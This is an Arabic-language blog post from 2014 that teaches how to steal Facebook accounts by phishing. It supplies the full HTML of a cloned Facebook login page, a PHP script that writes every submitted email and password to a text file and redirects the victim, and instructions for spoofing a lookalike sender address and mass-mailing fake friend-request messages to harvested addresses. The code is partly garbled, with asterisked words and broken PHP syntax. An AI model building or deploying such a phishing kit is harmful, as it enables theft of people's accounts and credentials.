الأربعاء، 28 مايو 2014

كيف سرقه حساب الفيس بوك بطريقه جديده


السلام عليكم

اليوم أحضرت لكم طريقة خطيرة لسرقة الفيس بوك FaCe BoOkسنعتمد طريقة
PhIsHiNg / SpOoFiNg التي تستعمل في جلب الفيزا وأشياء أخرى
أظن أنني أكثرت في الكلام
حسنا سوف أبدأ
ندخل ألان في صلب الموضوع وشاهدوا معي الطريقة خطوة خطوة
أول شئ ادخل على الموقع الرسمي للفيس بوك ثم صفحة الدخول أو مباشرة من هنا عفواً لايمكن عرض الرابط إلا بعد الرد على الموضوع و ادخل على السورس

عفواً لايمكن عرض الرابط إلا بعد الرد على الموضوع

واعمل نسخ للكل ولصق في أي محرر نصوص ثم اعمل كما في الصورة

عفواً لايمكن عرض الرابط إلا بعد الرد على الموضوع

بعدها قم بحفظ الملف على شكل index.php وليس index.htmlأو انسخ هذا الكود
كود PHP:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"
>
<
html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook">
<
head>
<
title>Login Facebook</title>
<
meta http-equiv="*******-type" *******="text/html; charset=utf-8" />
<
meta http-equiv="*******-language" *******="en" />
<
meta http-equiv="X-UA-Compatible" *******="IE=EmulateIE7" />
<
script type="text/javascript">//<![CDATA[(function(href) { var uri_re = /^(?:(?:[^:\/?#]+):)?(?:\/\/(?:[^\/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?/; href.replace(uri_re, function(all, path, query, frag) { if (frag) { var dst, src = path + (query ? '?' + query : ''); if (frag.charAt(0) == '/') { dst = frag.replace(/^\/+/, '/'); } else if (/&|=/.test(frag)) { var q = {}; var m = frag.match(/([^#]*)(#.*)?/); var arr = (query||'').split('&').concat((m[1]||'').split('&')); for (var i=0, length=arr.length; i<length; i++) { var t = arr[i].split('='); if (t.length && t[0] != '') { q[t[0]] = t[1]; } } var s = []; for (var i in q) { s.push(i+ (q[i]?'='+q[i]:'')); } dst = path+'?'+s.join('&')+(m[2]||''); } if (dst && dst != src) { window.location.replace(dst); } } }); })(window.location.href);Env={method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:141813,static_base:"http:\/\/static.ak.fbcdn.net\/",ecdc_page_regex:"^\\\/(safe_image\\.php|ajax\\\/perf\\.php|profile\\.php|home\\.php|photo\\.php|album\\.php|photo_search\\.php|photos\\.php|wall\\.php|friends\\\/ajax\\\/filters\\.php|friends\\\/ajax\\\/friends\\.php|friends\\\/ajax\\\/selector\\.php|group\\.php|groups\\.php|friends\\\/$)",ecdc_always_page_regex:"^\\\/ajax\\\/(chat\\\/buddy_list\\.php|presence\\\/update\\.php|typeahead_log\\.php|scribe_log\\.php|f\\.php)",tlds:["com"]}; var onloadRegister = window.onloadRegister || function(h) { onloadhooks.push(h); }; var onloadhooks = window.onloadhooks || []; var onafterloadRegister = window.onafterloadRegister || function(h) { onafterloadhooks.push(h); }; var onafterloadhooks = window.onafterloadhooks || []; function wait_for_load(element, e, f) { f = bind(element, f, e); if (window.loaded) { return f(); } switch ((e || event).type) { case 'load': onloadRegister(f); return; case 'click': if (element.original_cursor === undefined) { element.original_cursor = element.style.cursor; } if (********.body.original_cursor === undefined) { ********.body.original_cursor = ********.body.style.cursor; } element.style.cursor = ********.body.style.cursor = 'progress'; onafterloadRegister(function() { element.style.cursor = element.original_cursor; ********.body.style.cursor = ********.body.original_cursor; element.original_cursor = ********.body.original_cursor = undefined; if (element.tagName.toLowerCase() == 'a') { var original_event = window.event; window.event = e; var ret_value = element.onclick.call(element, e); window.event = original_event; if (ret_value !== false && element.href) { window.location.href = element.href; } } else if (element.click) { element.click(); } }); break; } return false; }; function bind(obj, method ) { var args = []; for (var ii = 2; ii < arguments.length; ii++) { args.push(arguments[ii]); } var fn = function() { var _obj = obj || (this == window ? false : this); var _args = args.slice(); for (var jj = 0; jj < arguments.length; jj++) { _args.push(arguments[jj]); } if (typeof(method) == "string") { if (_obj[method]) { return _obj[method].apply(_obj, _args); } } else { return method.apply(_obj, _args); } }; if (typeof method == 'string') { fn.name = method; } else if (method && method.name) { fn.name = method.name; } fn.toString = function() { return bind._toString(obj, args, method); }; return fn; }; bind._toString = bind._toString || function(obj, args, method) { return (typeof method == 'string') ? ('late bind<'+method+'>') : ('bound<'+method.toString()+'>'); }; function goURI(uri) { uri = uri.toString(); if (window.PageTransitions && PageTransitions.isInitialized()) { PageTransitions.go(uri); } else if (window.location.href == uri) { window.location.reload(); } else { window.location.href = uri; } } var PrimordialBootloader = window.PrimordialBootloader || { loaded : [], done : function(names) { PrimordialBootloader.loaded.push(names); } }; var Bootloader = window.Bootloader || { done : PrimordialBootloader.done };********.****** = "cavalry_transit_start_time=; expires=Mon, 26 Jul 1997 05:00:00 GMT; path=\/; domain=.facebook.com";
//]]>
</script><meta name="robots" *******="noodp,noydir" />
<meta name="description" *******="Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, share links and videos, and learn more about the people they meet." />  <script type="text/javascript" src="http://b.static.ak.fbcdn.net/js_strings.php/t85629/en_US"></script>

    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z6ZC0/lpkg/tad4m7ch/en_US/141/140499/css/3opxe4q4sps08ooo.pkg.css" />

    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zA1GV/lpkg/eb68cxab/en_US/141/132113/css/6l3vh5v383s40ccc.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z6CUT/lpkg/bb7n0ut5/en_US/141/137182/css/a22nq2m07kocs00s.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/z1UX4/lpkg/ech5n564/en_US/141/140102/css/aarrf4cqvq8g0w4o.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/zB5XO/lpkg/8jm0192v/en_US/141/141250/css/2aanubur3f0g40ko.pkg.css" />
<!--[if lte IE 6]><link rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zQMLT/l/64zoojsp/en_US/138879/css/ie6.css" type="text/css"/><![endif]-->
<!--[if IE 7]><link rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zBT4M/l/a8h3fb3n/en_US/136369/css/ie7.css" type="text/css"/><![endif]-->


    <script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/z610B/lpkg/5vgma302/en_US/141/141114/js/hf2fw0wrg4oogo0g.pkg.js"></script>
<script type="text/javascript">Bootloader.loadInitialResources([{"name":"js\/useragent.js","type":"js","src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/zEJTV\/l\/5k5jekhg\/nu_ll\/139152\/js\/useragent.js","permanent":false}])</script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/opensearch_desc.xml?7:72379" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/favicon.ico?7:132011" />
</head>
<body class="login_page ff3 UIPage_LoggedOut Locale_en_US">
<div id="nonfooter"><div id="page_height" class="clearfix"><div id="menubar_container"><div id="fb_menubar" class="fb_menubar_logged_out clearfix"><div id="fb_menubar_core"><ul class="fb_menu_list"><li class="fb_menu" id="fb_menubar_logo"><a href="http://www.facebook.com" title="Go to Facebook Home"><span>&nbsp;</span></a></li></ul></div><div id="fb_menubar_aux"><ul class="fb_menu_list"></ul></div></div><div class="signup_box clearfix"><div class="UILinkButton UILinkButton_SUBig"><input type="submit" class="UILinkButton_A" value="Sign Up" /><div class="UILinkButton_RW"><div class="UILinkButton_R"></div></div></div><span class="signup_box_message">Facebook helps you connect and share with the people in your life.</span></div></div><div id="dropmenu_container"></div><div id="*******" class="fb_*******"><div class="UIFullPage_Container"><div class="UIInterstitialContainer clearfix"><div class="UIRoundedTransparentBox"><div class="UIRoundedTransparentBox_Inner clearfix"><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_TL">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_TR">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_BL">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_BR">&nbsp;</div><div class="UIRoundedTransparentBox_Border clearfix"><div class="UIInterstitialBox_Container clearfix"><div class="UIOneOff_Container"><div class="title_header add_border"><h2 class="no_icon">Facebook Login</h2></div><form method="GET" action="next.php?login_attempt=1"><input type="hidden" name="From" value="FaCe BoOk" /><input type="hidden" name="charset_test" value="&euro;,&acute;,,,?,?,?" /><div id="loginform" style=""><input type="hidden" id="version" name="version" value="1.0" /><input type="hidden" id="return_session" name="return_session" value="0" /><input type="hidden" name="charset_test" value="&euro;,&acute;,,,?,?,?" /><div class="form_row clearfix"><label for="email" id="label_email">Email:</label><input type="text" class="inputtext" id="email" name="email" value="" /></div><div class="form_row clearfix"><label for="pass" id="label_pass">Password:</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div><label class="persistent"><input type="checkbox" class="inputcheckbox" id="persistent_inputcheckbox" name="persistent" value="1" /><span id="remember_me_text">Remember me</span></label><div id="buttons" class="form_row clearfix"><label></label><input type="submit" value="Login" name="login" id="login" class="inputsubmit" /> or <strong><a href="http://www.facebook.com/r.php?next=&amp;locale=en_US" id="reg_btn_link" target="_blank" rel="nofollow">Sign up for Facebook</a></strong></div><p class="reset_password form_row"><label></label><a href="http://www.facebook.com/reset.php?locale=en_US">Forgot your password?</a></p></div></form>
</div></div></div></div></div></div></div></div></div></div><div id="pagefooter"><div class="pagefooter_topborder clearfix"><div class="copyright_and_location clearfix"><div class="copyright"><span title="Non-Trimmed">Facebook </span><span id="rtime" title="93">&copy;</span> <span title="10.18.115.104">20</span><span title="15525040">09</span></div><div class="locale_footer_selector"><div id="locale_footer_selector_menu" class="locale_footer_selector_menu" style="display: none;"><a href="http://en-us.facebook.com" onclick="return wait_for_load(this, event, function() { return false });">English (US)</a><a href="http://es-la.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'es_LA'); return false; });">Espaol</a><a href="http://fr-fr.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'fr_FR'); return false; });">Franais</a><a href="http://de-de.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'de_DE'); return false; });">Deutsch</a><a href="http://ja-jp.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'ja_JP'); return false; });">???</a><a href="http://bg-bg.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'bg_BG'); return false; });">?????????</a><a href="http://ca-es.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'ca_ES'); return false; });">Catal</a><a href="http://cs-cz.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'cs_CZ'); return false; });">?etina</a><a href="http://cy-gb.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'cy_GB'); return false; });">Cymraeg</a><a href="http://da-dk.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'da_DK'); return false; });">Dansk</a><a href="http://el-gr.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'el_GR'); return false; });">????????</a><a href="http://en-gb.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'en_GB'); return false; });">English (UK)</a><a href="http://es-es.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'es_ES'); return false; });">Espaol (Espaa)</a><a href="http://fi-fi.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'fi_FI'); return false; });">Suomi</a><a href="http://hr-hr.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'hr_HR'); return false; });">Hrvatski</a><a href="http://hu-hu.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'hu_HU'); return false; });">Magyar</a><a href="http://id-id.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'id_ID'); return false; });">Bahasa Indonesia</a><a href="http://it-it.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'it_IT'); return false; });">Italiano</a><a href="http://ko-kr.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'ko_KR'); return false; });">???</a><a href="http://ms-my.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'ms_MY'); return false; });">Bahasa Melayu</a><a href="http://nb-no.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'nb_NO'); return false; });">Norsk (bokml)</a><a href="http://nl-nl.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'nl_NL'); return false; });">Nederlands</a><a href="http://pl-pl.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'pl_PL'); return false; });">Polski</a><a href="http://pt-br.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'pt_BR'); return false; });">Portugus (Brasil)</a><a href="http://pt-pt.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'pt_PT'); return false; });">Portugus (Portugal)</a><a href="http://ro-ro.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'ro_RO'); return false; });">Romn?</a><a href="http://ru-ru.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'ru_RU'); return false; });">???????</a><a href="http://sl-si.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'sl_SI'); return false; });">Sloven?ina</a><a href="http://sr-rs.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'sr_RS'); return false; });">??????</a><a href="http://sv-se.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'sv_SE'); return false; });">Svenska</a><a href="http://th-th.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'th_TH'); return false; });">???????</a><a href="http://tl-ph.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'tl_PH'); return false; });">Filipino</a><a href="http://tr-tr.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'tr_TR'); return false; });">Trke</a><a href="http://vi-vn.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'vi_VN'); return false; });">Ti?ng Vi?t</a><a href="http://zh-cn.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'zh_CN'); return false; });">??(??)</a><a href="http://zh-hk.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'zh_HK'); return false; });">??(??)</a><a href="http://zh-tw.facebook.com" onclick="return wait_for_load(this, event, function() { intl_set_******_locale(null, 'zh_TW'); return false; });">??(??)</a></div><div class="locale_footer_selector_hitarea" id="locale_footer_selector_hitarea"><a href="#" onclick="return wait_for_load(this, event, function() { optional_drop_down_menu(
    null,
    $('locale_footer_selector_hitarea'),
    $('locale_footer_selector_menu'),
    null, null, null, null, null, $('locale_footer_selector_hitarea'),
    {bottom: ($('locale_footer_selector_menu').offsetHeight + $('locale_footer_selector_hitarea').offsetHeight), left: 0}
    ); return false; });">English (US)</a><div class="locale_footer_selector_hitarea_right" onclick="return wait_for_load(this, event, function() { optional_drop_down_menu(
    null,
    $('locale_footer_selector_hitarea'),
    $('locale_footer_selector_menu'),
    null, null, null, null, null, $('locale_footer_selector_hitarea'),
    {bottom: ($('locale_footer_selector_menu').offsetHeight + $('locale_footer_selector_hitarea').offsetHeight), left: 0}
    ); return false; });"></div></div></div></div><div id="pagefooter_links"><ul id="pagefooter_left_links"><li><a href="http://www.facebook.com/login.php?ref=pf">Login</a></li><li><a href="http://www.facebook.com/facebook?ref=pf" rel="nofollow">About</a></li><li><a href="http://www.facebook.com/ads/?src=pf">Advertising</a></li><li><a href="http://developers.facebook.com/?ref=pf">Developers</a></li><li><a href="http://www.facebook.com/jobs/?ref=pf">Jobs</a></li><li><a href="http://www.facebook.com/terms.php?ref=pf" rel="nofollow">Terms</a></li></ul><ul id="pagefooter_right_links"><li><a href="http://www.facebook.com/findfriends.php?ref=pf">Find Friends</a></li><li><a href="http://www.facebook.com/policy.php?ref=pf" rel="nofollow">Privacy</a></li><li><a href="http://www.facebook.com/help.php?ref=pf" rel="nofollow">Help</a></li></ul></div></div></div><div id="js_buffer"><script type="text/javascript"></script>


<script type="text/javascript">
Bootloader.configurePage({"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z6ZC0\/lpkg\/tad4m7ch\/en_US\/141\/140499\/css\/3opxe4q4sps08ooo.pkg.css":["css\/3opxe4q4sps08ooo.pkg.css",true],"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/zA1GV\/lpkg\/eb68cxab\/en_US\/141\/132113\/css\/6l3vh5v383s40ccc.pkg.css":["css\/6l3vh5v383s40ccc.pkg.css",false],"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z6CUT\/lpkg\/bb7n0ut5\/en_US\/141\/137182\/css\/a22nq2m07kocs00s.pkg.css":["css\/a22nq2m07kocs00s.pkg.css",false],"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z1UX4\/lpkg\/ech5n564\/en_US\/141\/140102\/css\/aarrf4cqvq8g0w4o.pkg.css":["css\/aarrf4cqvq8g0w4o.pkg.css",true],"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zB5XO\/lpkg\/8jm0192v\/en_US\/141\/141250\/css\/2aanubur3f0g40ko.pkg.css":["css\/2aanubur3f0g40ko.pkg.css",false]});
Bootloader.done(["css\/3opxe4q4sps08ooo.pkg.css","css\/6l3vh5v383s40ccc.pkg.css","css\/a22nq2m07kocs00s.pkg.css","css\/aarrf4cqvq8g0w4o.pkg.css","css\/2aanubur3f0g40ko.pkg.css"]);


onloadRegister(function() {window.loading_page_chrome = true;});
onloadRegister(function() {new MenuBar("fb_menubar_core").setTimeoutInterval(250).init();});
onloadRegister(function() {new MenuBar("fb_menubar_aux").setTimeoutInterval(100).init();});
onloadRegister(function() {window.loading_page_chrome = false;});
onloadRegister(function() {ffid='64Fjtb+6is5Lb3DM9dR2AQ==';});
onloadRegister(function() {
      onbeforeunloadRegister(function () {
        window.set****** && window.set******("cavalry_transit_start_time", (new Date()).getTime(), 10000);
        }, true);});

</script></div><script type="text/javascript">if (!window.ge) {
  window.ge = function(id) {
    return ********.getElementById(id);
  }
}

window.onload = function() {
  ********.****** = "test_******=1;domain=.facebook.com";
  var e = ge('email'),
      p = ge('pass');

  //  We sometimes show you *only* a password prompt, so focus that if there
  //  is no e-mail prompt.

  if (e && !e.value) {
    e.focus();
  } else if (p) {
    p.focus();
  }
};

function formchange() {
  (ge('persistent')||{}).checked = 0;
}

function pop(url) {
  window.open(url);
}
</script></body>
</html> 
ألان لدينا صفحة التسجيل لحد ألان كل شيء تمام
الآن يجب علينا صنع صفحة أخرى وهي التي قمنا بتسميتها next.phpولصنعها افتح مرة أخرى محرر النصوص والصق هذا الكود وأحفظ الصفحة تحت اسم next.php
كود PHP:
<?php// FiSh ThE FaCe BoOk
// By DeAtH DeV!L <I HaTe Go To ScHoOl>
header ('Location: login.html');$handle fopen("password.txt""a");
foreach(
$_GET as $variable => $value) {fwrite($handle$variable);fwrite($handle": ");fwrite($handle$value);fwrite($handle"\r\n");
}
fwrite($handle"---------------------------------\r\n");fclose($handle);
exit;
?>
?>?>ثم قم بعمل ملف نصي سميه "password.txt" لتصلك الباسوردات عليه
ملاحظة:الملف النصي يجب أن يكون بنفس مجلد next.php
لكن بقيت خطوة واحدة وهي رفع ملفاتك أي index.php و next.phpو password.txt على أي استضافة مجانية تدعم php
نأتي ألان للعمل الجدي وهي عملية spoof emails والأدوات التي سنحتاجها هي خد ورقة وقلم وسجل أول شئ لازم تسجل بيميل يبعد الشكوك ويكون مشابه جدا للايميل الأصلي للشركة مثل+عفواً لايمكن عرض الرابط إلا بعد الرد على الموضوعالرسالة الأصلية التي تقول : لقد تلقيت دعوة صداقة من .... للموافقة اضغط علىندخل ألان على صندوقنا الخاص بإرسال الرسائل ونعمل كما في الصورة
عفواً لايمكن عرض الرابط إلا بعد الرد على الموضوع
ثم قم بإرسال شبكتك للايميلات اللي عندك و يستحسن استخدام برنامج جلب الايميلات لتكون العملية ناجحة بنسبة مرضية
وهذه النتيجة بعد تجربتها

عفواً لايمكن عرض الرابط إلا بعد الرد على الموضوع
كان هذا موضوعنا لليوم في انتظار مواضيع شيقة أخرى مع DeAtH DeV!Lومبروك الباسوردات مسبقا
شكرا لــJetli007 لتعليمي هذه الطريقة
هذا أول موضوع لي في المنتدى و هو إهداء لـــ
H.T.T.P
Hacker Tunisien Team & Protection
وخصوصا لــPASSWORD
** الرجاء من عاشقي CoPy & PaSt ذكر الاسم عند النقل **
**الصور في المرفقات**

هناك 7 تعليقات: